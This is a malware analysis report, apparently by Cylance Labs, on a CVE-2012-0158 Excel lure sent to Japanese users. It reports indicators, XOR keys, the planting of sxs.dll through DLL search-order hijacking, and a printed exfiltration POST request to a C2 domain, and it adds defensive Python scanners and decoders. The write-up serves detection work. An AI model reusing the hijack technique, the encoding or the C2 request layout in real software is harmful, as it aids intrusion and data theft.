Over the past few weeks Cylance Labs identified a surge in targeted documents against Japanese users. These documents coincide perfectly with world news concerning recent escalating tensions between China and Japan over the disputed Senkaku/Diaoyu Islands. These files are being sent regularly to a number of different users and industries using a variety of old and new exploits. China often denies any involvement in ongoing cyber attacks; however, the ongoing dispute between the two countries has raised nationalistic pride on both sides and put the countries on edge.
We have decided to share some of our findings in hopes of empowering defenders to protect their systems.
Meta Information:
Filename: keikaku-201302.xls (translates as "Plan-201302")
MD5: 7ec89be945add54aa67009dbc12a9260
SHA1: 1434a04f10c2162eab82703ef79e407dcbf5c30f
SHA256: 6d7b9f15cd8e3e75295e1c5ca46a3610e0e22b45d7bea18444b1f54e127131d0
FileSize: 172,564 Bytes
Document Structure Summary Information:
Operating System Version: 5.1
Size: 12713 Bytes
'Root Entry' (root) 8192 bytes {00020820-0000-0000-C000-000000000046}
'\x01CompObj' (stream) 112 bytes
'\x05DocumentSummaryInformation' (stream) 72 bytes
'Workbook' (stream) 4733 bytes
'_VBA_PROJECT_CUR' (storage)
'PROJECT' (stream) 424 bytes
'PROJECTwm' (stream) 62 bytes
'VBA' (storage)
'Sheet1' (stream) 1066 bytes
'ThisWorkbook' (stream) 985 bytes
'_VBA_PROJECT' (stream) 2933 bytes
'dir' (stream) 804 bytes
'encryption' (stream) 1522 bytes
File Details:
The file was targeted at Japanese users and exploits CVE-2012-0158, which was first used in the wild in April of 2012. The binary is encoded within the document with a single byte XOR key of 0x12 and skips the first byte of the binary (0x4D). An empty dummy document is also decoded and loaded upon successful exploitation and is stored at file offset 0x23C14 with the single byte XOR key of 0x97.
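To recover a binary hidden this way from a carrier file, a defender can scan for single-byte-XOR'd PE headers and derive the key from the "MZ" signature rather than guessing it. The following Python is an added example, not Cylance's tooling: it uses a constructed PE-shaped header in place of the real sample, handles both a fully encoded image and the variant described above where the leading 0x4D is left plain, and is key-agnostic. The dummy document at 0x23C14 is not a PE image, so this scanner locates only the executable.

```python
import struct

def build_fake_pe() -> bytes:
    """Constructed stand-in: a PE-shaped header (not a real executable)."""
    hdr = bytearray(0x80)
    hdr[0:2] = b"MZ"
    struct.pack_into("<I", hdr, 0x3C, 0x40)        # e_lfanew -> "PE\0\0" at 0x40
    hdr[0x40:0x44] = b"PE\0\0"
    hdr[0x44:0x46] = b"\x4c\x01"                   # Machine = IMAGE_FILE_MACHINE_I386
    return bytes(hdr)

def xor_bytes(data: bytes, key: int) -> bytes:
    return bytes(b ^ key for b in data)

def xor_encode(data: bytes, key: int, skip_first: bool) -> bytes:
    """Single-byte XOR; with skip_first the leading 0x4D stays plain, as in the sample."""
    out = bytearray(xor_bytes(data, key))
    if skip_first:
        out[0] = data[0]
    return bytes(out)

def find_xor_pe(buf: bytes) -> list:
    """Return (offset, key, skip_first, e_lfanew) for each single-byte-XOR'd
    image whose MZ and PE signatures both decode correctly."""
    hits = []
    for off in range(len(buf) - 0x3F):
        key = buf[off + 1] ^ 0x5A                   # 'Z' of "MZ" is always encoded
        for skip_first in (False, True):
            if skip_first and key == 0:
                continue                            # plain MZ already reported
            first = buf[off] if skip_first else buf[off] ^ key
            if first != 0x4D:
                continue
            e_lfanew = struct.unpack("<I", xor_bytes(buf[off + 0x3C:off + 0x40], key))[0]
            if not 0x40 <= e_lfanew <= 0x1000 or off + e_lfanew + 4 > len(buf):
                continue
            if xor_bytes(buf[off + e_lfanew:off + e_lfanew + 4], key) == b"PE\0\0":
                hits.append((off, key, skip_first, e_lfanew))
    return hits

def decode_pe(buf: bytes, off: int, key: int, skip_first: bool, size: int) -> bytes:
    body = buf[off:off + size]                      # carve `size` bytes at a reported hit
    head = body[:1] if skip_first else xor_bytes(body[:1], key)
    return head + xor_bytes(body[1:], key)

# Constructed carrier: padding, the key-0x12/plain-'M' form, padding, then the same image fully XOR'd with 0x97.
FAKE = build_fake_pe()
CARRIER = (b"\x00" * 0x100 + xor_encode(FAKE, 0x12, True)
           + b"\xff" * 0x40 + xor_encode(FAKE, 0x97, False))
```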
Dropper Details:
FileSize: 153,600 Bytes
MD5: C266FAA587136328C939D2BB25EA7D42
The interesting facet of this particular sample is that the decoded binary does nothing but create the file C:\Program Files\Internet Explorer\sxs.dll. The sxs.dll file is stored within the dropper as a resource named DATA with a Chinese code page (2052). The backdoor takes advantage of a vulnerability known as DLL search order hijacking: when Internet Explorer is executed, it loads the sxs.dll in its own directory before the legitimate sxs.dll in the system32 directory, %systemroot%\system32\. Any file named sxs.dll in the same directory as the iexplore.exe binary will therefore most likely be malicious in any future encounters. Investigators should add this to the list of known DLL search order hijacking locations, which includes %systemroot%\ntshrui.dll, %systemroot%\fxsst.dll, %systemroot%\linkinfo.dll, and %systemroot%\midimap.dll.
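A defender-side sweep of the hijack locations listed above, added here as an example and not part of Cylance's write-up: it reports every DLL found in one of those locations, its MD5, and whether it is byte-identical to the copy in system32 (a file in the Internet Explorer directory is suspect either way, since no sxs.dll belongs there). The root directories are parameters so the check can be exercised against a scratch tree; on a live host they come from the SystemRoot and ProgramFiles environment variables.

```python
import hashlib
import os

# Search-order hijack locations named in this write-up: (root, path under that root).
# The legitimate copy of each of these DLLs lives in %systemroot%\system32.
HIJACK_LOCATIONS = [
    ("programfiles", os.path.join("Internet Explorer", "sxs.dll")),
    ("systemroot", "ntshrui.dll"),
    ("systemroot", "fxsst.dll"),
    ("systemroot", "linkinfo.dll"),
    ("systemroot", "midimap.dll"),
]

def md5_of(path: str) -> str:
    h = hashlib.md5()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(1 << 16), b""):
            h.update(chunk)
    return h.hexdigest()

def check_hijack_paths(systemroot: str, programfiles: str) -> list:
    """Return a finding for every hijack-location DLL that exists: its path,
    MD5, and whether it matches the system32 copy (None if no such copy)."""
    roots = {"systemroot": systemroot, "programfiles": programfiles}
    findings = []
    for root_key, rel in HIJACK_LOCATIONS:
        candidate = os.path.join(roots[root_key], rel)
        if not os.path.isfile(candidate):
            continue
        legit = os.path.join(systemroot, "system32", os.path.basename(rel))
        legit_md5 = md5_of(legit) if os.path.isfile(legit) else None
        digest = md5_of(candidate)
        findings.append({
            "path": candidate,
            "md5": digest,
            "matches_system32": (digest == legit_md5) if legit_md5 else None,
        })
    return findings

if __name__ == "__main__":
    # Live-host defaults; on a non-Windows box these directories simply do not exist.
    for f in check_hijack_paths(os.environ.get("SystemRoot", r"C:\Windows"),
                                os.environ.get("ProgramFiles", r"C:\Program Files")):
        print(f"{f['path']}  md5={f['md5']}  matches_system32={f['matches_system32']}")
```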
Backdoor Details:
FileSize: 78,336 Bytes
MD5: 653C8AEAE41F0A008E3D31C13D92A038
When Internet Explorer is executed, the file is loaded into the process's address space and creates a mutex named myhorse_ie_001. The backdoor exports a function named fuc_trend.
NETWORK-BASED INDICATORS:
- The malware will make DNS requests for www.dotaplayers.com which appears to be a legitimate small website hosting company.
- The malware communicates over TCP port 80 using HTTP requests similar to the one below.
POST /jd/upload.aspx?filepath=info&filename={Hostname}_{IP}.jpg HTTP/1.1
Host: www.dotaplayers.com
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
Accept-Language: en-us
Content-Type: multipart/form-data
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
Cache-Control: no-cache
User-Agent: MyAgent
Content-Length: 3112
Where {Hostname} is the hostname of the victim system and {IP} is its IP address. The backdoor also uses the User-Agent mydownload when downloading files from the C2 server.
HOST-BASED INDICATORS:
- The malware will create the file %temp%\tmp.dat and gather basic system information before encoding and sending it in the body of the POST request.
- The malware may also create the following files in the %temp% directory.
- cmd{decimal value}.dat
- msuc.dat
- order.dat
- tmpxor.dat
HostName: {Hostname}
IP: {IP}
Proxy: (null)
User: Administrator
SystemDir: C:\WINDOWS\system32
OS Language Version: 437
System Version: 5.1 Service Pack 3 (Build 2600)
Process:
ID: 4 (?)
ID: 472 (\SystemRoot\System32\smss.exe)
ID: 888 (\??\C:\WINDOWS\system32\winlogon.exe)
ID: 932 (C:\WINDOWS\system32\services.exe)
ID: 944 (C:\WINDOWS\system32\lsass.exe)
ID: 1100 (C:\WINDOWS\system32\svchost.exe)
ID: 1364 (C:\WINDOWS\System32\svchost.exe)
ID: 1888 (C:\WINDOWS\Explorer.EXE)
ID: 188 (C:\WINDOWS\system32\spoolsv.exe)
ID: 400 (C:\Program Files\Parallels\Parallels Tools\Services\coherence.exe)
ID: 424 (C:\Program Files\Parallels\Parallels Tools\Services\prl_tools_service.exe)
ID: 536 (C:\Program Files\Parallels\Parallels Tools\Services\prl_tools.exe)
ID: 596 (C:\WINDOWS\system32\svchost.exe)
ID: 1572 (C:\Program Files\Parallels\Parallels Tools\prl_cc.exe)
ID: 1592 (C:\WINDOWS\system32\ctfmon.exe)
ID: 1656 (C:\WINDOWS\system32\wscntfy.exe)
ID: 3284 (C:\Program Files\Sandboxie\SbieSvc.exe)
ID: 2052 (C:\Program Files\Sandboxie\SbieCtrl.exe)
ID: 2744 (C:\WINDOWS\system32\cmd.exe)
ID: 868 (C:\Python26\python.exe)
ID: 3560 (C:\Program Files\Internet Explorer\iexplore.exe)
ID: 1688 (C:\Program Files\Internet Explorer\iexplore.exe)
Figure 1: Example contents of "tmp.dat"

Data like that shown in the figure above is first converted to Unicode and then XOR-encoded against the key *&~^%@0hh8979 before being sent to the C2 server.
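An added example, not the author's code, of decoding a captured POST body with that key and turning it back into the tmp.dat fields. It assumes "Unicode" means UTF-16LE and that the key repeats byte-wise from the start of the buffer; the hostname, address and process list in the sample are constructed. The triage function is the kind of check a proxy or IDS script can apply to any upload sent with the MyAgent User-Agent.

```python
KEY = b"*&~^%@0hh8979"   # key named in the write-up

def xor_repeating(data: bytes, key: bytes = KEY) -> bytes:
    """Repeating-key XOR (its own inverse); the key restarts at offset 0."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))

def encode_report(text: str) -> bytes:
    """The described pipeline: text -> Unicode (assumed UTF-16LE) -> XOR."""
    return xor_repeating(text.encode("utf-16-le"))

def decode_report(body: bytes) -> str:
    """Inverse of encode_report, applied to a captured POST body."""
    return xor_repeating(body).decode("utf-16-le")

def looks_encoded_report(body: bytes) -> bool:
    """Triage check: a tmp.dat upload decodes to a leading 'HostName:' field."""
    return xor_repeating(body[:20]).startswith("HostName:".encode("utf-16-le"))

def parse_report(text: str) -> dict:
    """Split decoded tmp.dat text into fields; 'ID: <pid> (<image>)' lines are
    collected as (pid, image) tuples under 'processes'."""
    fields, procs = {}, []
    for line in text.splitlines():
        line = line.strip()
        if line.startswith("ID:"):
            pid, _, image = line[3:].strip().partition(" ")
            procs.append((int(pid), image.strip("()")))
        elif ":" in line:
            name, _, value = line.partition(":")
            fields[name.strip()] = value.strip()
    fields["processes"] = procs
    return fields

# Constructed sample in the tmp.dat layout (hostname and IP are placeholders).
SAMPLE = (
    "HostName: VICTIM-PC\r\nIP: 192.0.2.10\r\nProxy: (null)\r\n"
    "User: Administrator\r\nSystemDir: C:\\WINDOWS\\system32\r\nProcess:\r\n"
    "ID: 4 (?)\r\nID: 472 (\\SystemRoot\\System32\\smss.exe)\r\n"
)

if __name__ == "__main__":
    body = encode_report(SAMPLE)
    print(looks_encoded_report(body), parse_report(decode_report(body)))
```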
Conclusion
The network traffic for this specific trojan can readily be identified from the static User-Agent strings used within the code, MyAgent and mydownload. While these attacks appear to be limited in scope, this novel persistence method will undoubtedly be applied in future malicious endeavors by the attackers. Investigators should carefully examine any file named sxs.dll found in the same directory as Internet Explorer.
Users are encouraged to be wary of any attachments received with a .doc or .xls extension. Modern versions of Microsoft Office (2007+) by default save documents using the newer Office Open XML format with a .docx or .xlsx extension. Cylance Labs has yet to identify a malicious Office document in these attacks that takes advantage of the OOXML format.